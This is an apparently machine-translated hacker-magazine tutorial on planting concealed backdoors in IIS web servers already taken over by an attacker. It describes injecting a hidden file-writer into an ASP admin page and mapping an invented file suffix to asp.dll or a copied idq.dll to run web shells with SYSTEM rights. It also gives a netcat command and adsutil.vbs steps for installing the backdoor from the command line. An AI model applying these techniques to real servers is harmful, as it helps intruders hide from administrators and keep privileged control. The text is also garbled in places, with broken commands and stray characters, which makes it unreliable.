Author: Lcx Source: Hacker X Files passed on broilers asp pages back door, even if you change the original code is variable, escaped the anti-virus software, but a careful administrator will find in his website will be more of a web directory ASP file. In response to this problem, I think two ways, one is ASP INJECTION (as if this word is really popular); one is to use Asp.dll in the IIS manager to parse the arbitrary suffix name. These two methods do not have much technical speech, but it is a good idea. If you think more deeply along this idea, you can configure a wonderful IIS back door. Details are as follows: An ASP Injection for ASP Back Gate Placement. First look at the picture 1: This is the landing page of our machine's mobile network article management, and there is no difference in peace, and the original features exist. Look at the second picture: Comparison: Figure 1 URL is http://192.168.1.3/asp/wz/admin.asp Figure 2 is http://192.168.1.3/asp/wz/admin.asp?id = 1, add a parameter "? Id = 1" behind admin.asp, I will come out. Figure 2 below, you can enter the file name in the front input box, the text box behind you can copy any code you want, and generate a button to generate CGI / ASP / PHP / ASPX, etc. Web pages back door or any text file. How did this do it? As long as you put this code according to the prompt modification, you can insert a ASP web code. code:
Value =
>
It is worth noting that this code requires the server to support the FSO, and it is not taken effect in all ASP files. As in the inserted ASP file contains code,
This code does not take effect, but does not affect the use of the original file. If you will write ASP, you can also write some ASP backmen directly in the original ASP file in broiler. The second of the ASP rear door placement method is used in the IIS manager to parse the arbitrary suffix name. This is done, open the computer's Control Panel - Administrative Tool -Internet Service Manager -Web Site - Right click Properties - Proto - Configuration - Add. I added a filemap that suffixed for LCX, parsing with ASP.dll under NT / System32. Like Figure 3: After doing this, we rename the common cmd.asp to cmd.lcx, then run, what happens? Figure 4: The same is a web back door. Of course, what suffix is more concealed, see your intelligence. In-depth study of ASP back door placement method. I just used asp.dll to resolve the suffix of LCX. If we use a special DLL program to resolve. LCX suffix? If you will program, you can write a DLL program according to your needs. Will not? Ha, the Green League Yuan Ge has written it for us. I think that there is no, that is the IDQ.dll, you can pass the idq.dll that is connected to ISPC in the scripts directory. U Vulnerability is used to improve permissions. Now I use this IDQ.dll to make a good map of the ASP back door method, what will happen? Can be used to do two things. One is a user who can add an IISUser and password to ABCD 1234 by executing http: //targetip/anything.lcx. Figure 5: This xxx.lcx can be renamed casually, and the host does not exist. If you are still not satisfied, we use the NC landing host to see. Type the following command. NC Targetip 80 Post /% 08 / Anything.lcx, how? Go to the landing, under W2K SP3 it is SYSTEM authority. Figure 6: The principle is limited herein, I don't talk about the space, you can go to the Great League in the back door of the IIS configuration file written by Tombkeeper PGN. Netizen Czy also wrote a same DLL program, using the HTTP: // ip / *. You have a suffix you have in IE? Shell = command you want. Look at the back door I have made on broiler, I used it to parse .ph4 suffix. Figure 7: Seeing this, you may have to say, this IIS back door is installed in the 3389 terminal, what is the order? We also have a way. IIS default installation, will generate 19 VBS scripts in the / inetpub / adminsscripts directory, we use one of the adsutil.vbs to help us install this wonderful IIS back door.
With the following, we will walk away, look at the happiness under the command line: 1 Copy IDq.dll% SystemRoot% / System32 / Iisapi.dll dt....... 到 到 到 到 到 到 到 目 目 目 目 目.ll2 gets the case of sites CScript Adsutil.vbs Enum / P / W3SVC [/ W3SVC / INFO] [/ w3svc / filters] [/ w3svc / 2] ----------> These is intended Virtual site [/ w3svc / 3] [/ w3svc / 4] [/ w3svc / 4] System32 / idq.dll "" c: /winnt/system32/inetsrv/httpext.dll "" c: /winnt/system32/inetsrv/httpodbc.dll "C: /winnt/system32/inetsrv/ssinc.dll" "C : /Winnt/system32/msw3prt.dll "4. Get all the privileged DLLs from IIS and set the iisapi.dll from step 1 COPY to the InProcessisapiapps group so that our latter has local_system permissions. In this step, you have to add the DLL that you look at the third step. If you don't add, the original privilege is deleted in the DLL. Cscript adsutil.vbs set / w3svc / inProcessisapiapps "c: /winnt/system32/idq.dll" "c: /winnt/system32/inetsrv/httpext.dll" "c: /winnt/system32/inetsrv/httpodbc.dll" " C: /winnt/system32/inetsrv/ssinc.dll "" c: /winnt/system32/msw3prt.dll "" c: /winnt/system32/iisapi.dll "5. Setting mapping cscript adsutil.vbs set / w3svc / scriptmaps ".asp, c: /winnt/system32/inetsrv/asp.dll, 1, fulam ,post ,trace" "" ".CER, C: /WINNT/SYSTEM32/INETSRV/ASP.DLL, 1, Get, Head, POST, TRACE ".asa, c: /winnt/system32/inetsrv/asp.dll, 1, get, thehead ,post ,trace" ".idc, c: /winnt/system32/inetsrv/httpodbc.dll ,1, Options, Get, HEAD, POST, PUT, DELETE, TRACE "" SHTM, C: /Winnt/System32/INetsrv/ssinc.dll, 1 ,get ,post "" "SHTML, C: / Winnt / System32 / inetsrv / SSINC.DLL, 1, GET, POST "" .stm, c: /winnt/system32/inetsrv/ssinc.dll, 1, get ,post "" .lcx, c: /winnt/system32/iisapi.dll, 3, Get, head, post "This is the default installation, the mapping in the original IIS manager adds a .lcx mapping, parsing the Iisapi.dll of our COPY, pay attention to the last line is .lcx mapping, You can add a separate suffix name mapping.
